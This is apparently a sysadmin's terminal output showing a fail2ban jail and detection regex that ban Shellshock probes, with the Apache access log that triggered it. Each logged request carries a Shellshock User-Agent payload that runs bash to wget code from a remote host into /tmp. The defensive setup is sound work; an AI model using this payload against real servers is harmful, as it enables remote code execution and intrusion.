# iptables -LChain INPUT (policy ACCEPT)target prot opt source

1. # iptables -L
2. Chain INPUT (policy ACCEPT)
3. target prot opt source destination
4. fail2ban-ssh tcp -- anywhere anywhere multiport dports ssh
5.  
6. Chain FORWARD (policy ACCEPT)
7. target prot opt source destination
8.  
9. Chain OUTPUT (policy ACCEPT)
10. target prot opt source destination
11.  
12. Chain fail2ban-ssh (1 references)
13. target prot opt source destination
14. RETURN all -- anywhere anywhere
15.  
16. # fail2ban-client status apache-vulnerability-scan
17. Status for the jail: apache-vulnerability-scan
18. |- filter
19. | |- File list: /var/log/apache2/other_vhosts_access.log /var/log/apache2/access.log
20. | |- Currently failed: 0
21. | `- Total failed: 7
22. `- action
23. |- Currently banned: 1
24. | `- IP list: 10.0.2.2
25. `- Total banned: 1
26.  
27. # cat /etc/fail2ban/jail.local
28. [apache-vulnerability-scan]
29.  
30. enabled = true
31. port = http,https
32. filter = apache-vulnerability-scan
33. logpath = /var/log/apache*/*access.log
34. maxretry = 1
35. banaction = iptables-multiport
36. findtime = 600
37. bantime = 600
38.  
39. # fail2ban-regex -v /var/log/apache2/access.log /etc/fail2ban/filter.d/apache-vulnerability-scan.conf
40.  
41. Running tests
42. =============
43.  
44. Use failregex file : /etc/fail2ban/filter.d/apache-vulnerability-scan.conf
45. Use log file : /var/log/apache2/access.log
46.  
47.  
48. Results
49. =======
50.  
51. Failregex: 7 total
52. |- #) [# of hits] regular expression
53. | 1) [7] ^<HOST> -.*"\(\)\s*\{[^;"]+[^}"]+}\s*;.*$
54. | 10.0.2.2 Tue Nov 24 19:49:24 2015
55. | 10.0.2.2 Tue Nov 24 19:49:35 2015
56. | 10.0.2.2 Tue Nov 24 19:49:36 2015
57. | 10.0.2.2 Tue Nov 24 19:49:46 2015
58. | 10.0.2.2 Tue Nov 24 19:49:48 2015
59. | 10.0.2.2 Tue Nov 24 19:49:49 2015
60. | 10.0.2.2 Tue Nov 24 19:49:50 2015
61. `-
62.  
63. Ignoreregex: 0 total
64.  
65. Date template hits:
66. |- [# of hits] date format
67. | [7] Day/MONTH/Year:Hour:Minute:Second
68. | [0] WEEKDAY MONTH Day Hour:Minute:Second[.subsecond] Year
69. | [0] WEEKDAY MONTH Day Hour:Minute:Second Year
70. | [0] WEEKDAY MONTH Day Hour:Minute:Second
71. | [0] MONTH Day Hour:Minute:Second
72. | [0] Year/Month/Day Hour:Minute:Second
73. | [0] Day/Month/Year Hour:Minute:Second
74. | [0] Day/Month/Year2 Hour:Minute:Second
75. | [0] Month/Day/Year:Hour:Minute:Second
76. | [0] Year-Month-Day Hour:Minute:Second[,subsecond]
77. | [0] Year-Month-Day Hour:Minute:Second
78. | [0] Year.Month.Day Hour:Minute:Second
79. | [0] Day-MONTH-Year Hour:Minute:Second[.Millisecond]
80. | [0] Day-Month-Year Hour:Minute:Second
81. | [0] Month-Day-Year Hour:Minute:Second[.Millisecond]
82. | [0] TAI64N
83. | [0] Epoch
84. | [0] ISO 8601
85. | [0] Hour:Minute:Second
86. | [0] <Month/Day/Year@Hour:Minute:Second>
87. | [0] YearMonthDay Hour:Minute:Second
88. | [0] Month-Day-Year Hour:Minute:Second
89. `-
90.  
91. Lines: 7 lines, 0 ignored, 7 matched, 0 missed
92.  
93. # cat /var/log/apache2/access.log
94. 10.0.2.2 - - [24/Nov/2015:03:49:24 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
95. 10.0.2.2 - - [24/Nov/2015:03:49:35 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
96. 10.0.2.2 - - [24/Nov/2015:03:49:36 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
97. 10.0.2.2 - - [24/Nov/2015:03:49:46 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
98. 10.0.2.2 - - [24/Nov/2015:03:49:48 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
99. 10.0.2.2 - - [24/Nov/2015:03:49:49 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
100. 10.0.2.2 - - [24/Nov/2015:03:49:50 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""